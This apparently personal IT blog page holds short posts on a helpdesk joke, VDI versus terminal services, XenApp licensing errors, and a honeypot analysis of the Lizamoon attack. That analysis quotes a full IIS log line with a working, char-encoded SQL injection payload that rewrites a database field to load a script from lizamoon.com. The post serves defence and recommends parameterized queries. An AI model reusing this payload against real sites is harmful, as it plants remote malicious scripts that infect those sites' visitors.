Oct 10
User – My Phone is broken
IT Support – Hi, We’ll need a bit more info to start with. Can we get the symptoms of how’s it’s not working and if there was any cause for this?
User – The phone stopped working after I retrieved it from an hour long wash cycle in my washer. I’ve dried it out all weekend and tried it several times but there is nothing happening. I think it is a totally water damaged.
Apr 06
The past 10 days has seen a big increase in Lizamoon activity. Stories about Lizamoon have reported anything from a few thousand site being attacked to 1.5 million. Some of the sites attacked have been high profile.
So, what does Lizamoon really do?
I created a honeypot site with a windows 2003 server running IIS. The site was attacked via an http GET statement targeted at a webpage that had a non validated SQL query. The database had a note field injected with a string of text. This is a line from the IIS log:-
2011-03-29 12:17:02 192.168.0.25 GET /sub-folder/page.asp rec_id=3251681+update+table_1+set+field_1=REPLACE(cast(field_1+as+varchar(8000)),cast(char(60)%2Bchar(47)%2Bchar(116)%2Bchar(105)%2Bchar(116)%2Bchar(108)%2Bchar(101)%2Bchar(62)%2Bchar(60)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(32)%2Bchar(115)%2Bchar(114)%2Bchar(99)%2Bchar(61)%2Bchar(104)%2Bchar(116)%2Bchar(116)%2Bchar(112)%2Bchar(58)%2Bchar(47)%2Bchar(47)%2Bchar(108)%2Bchar(105)%2Bchar(122)%2Bchar(97)%2Bchar(109)%2Bchar(111)%2Bchar(111)%2Bchar(110)%2Bchar(46)%2Bchar(99)%2Bchar(111)%2Bchar(109)%2Bchar(47)%2Bchar(117)%2Bchar(114)%2Bchar(46)%2Bchar(112)%2Bchar(104)%2Bchar(112)%2Bchar(62)%2Bchar(60)%2Bchar(47)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(62)+as+varchar(8000)),cast(char(32)+as+varchar(8)))–|49|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record. – 95.64.9.18 HTTP/1.1 Mozilla/5.0+(Windows;+U;+Windows+NT+5.0;+en-US;+rv:1.4)+Gecko/20030624+Netscape/7.1+(ax) – - www.domain.co.uk 500 2709 1017 9921
You can see that the attack was initiated from 95.64.9.18 and instructed the underlying SQL server to replace the contents of field_1 in table_1 with a string of text.
The SQL statement was crafted to block the rest of the statement from running by disguising as a comment i.e. –
This style of attack can be mitigated by parameterized statements and type checking
Mar 22
I’m creating Virtual Machines Locally with NxTop 3.0 type 1 client hypervisor http://virtualcomputer.com/node/813 #NxTop
Mar 09
Over the last couple of days I have configured a POC deployment of XenDesktop over VMWare. Apart from a small stumbling block to do with SSL certificates on the host server it was simple enough to deploy a LAN based XenDesktop environment. Configuring a web based deployment was slightly more challenging but that was more down to my limited test environment in my cupboard/office than anything else.
In the next couple of weeks I hopefully will have time to build a similar text environment with VMWare View. I will compare the two products after tests are complete.
Getting back to the topic in hand, I was debating if there is a good ROI and lower TCO argument in deploying a VDI solution over a TS or physical environment
I have deployed Citrix Metaframe/Presentation Server/Xenapp6/Terminal Services and for the majority of users fail to see why they need anything but the standard set of corporate applications be it the defacto MS Office, the corporate version of CRM or finance system. You can have a much higher user density with TS than you can with VDI. Higher Density means fewer server’s and lower cost of infrastructure.
TS & VDI are both a style of Server Based Computing (SBC) and therefore have some of the same limitations such as remote display protocols. They both provide a much lower TCO over thick provisioning.
So we are only talking about the smaller percentage off users that need to run applications that will not run in a shared server user environment such as TS but will run is a shared server VDI environment.
There are advantages with VDI over TS:-
As technology marches on the user density gap will narrow between TS and VDI and with it the cost differential will reduce.
For now the first question to ask is “Do my applications require a VDI solution”
Mar 01
This is a common error to receive when building a new XenApp 6 farm.
The quickest test to run is “qfarm /load” from the XenApp server.
if it returns something like:-
Server Name Server Load
—————————————————–
Server1 20000
Then odds in you have a licensing Issue.
This is not a complete list but the first few things to try. After each change try the “qfarm /load” again. If you get a 0 or 100 then it’s likely you have a correctly working license server
BBC News – Technology
Loading tweets...
Recent Comments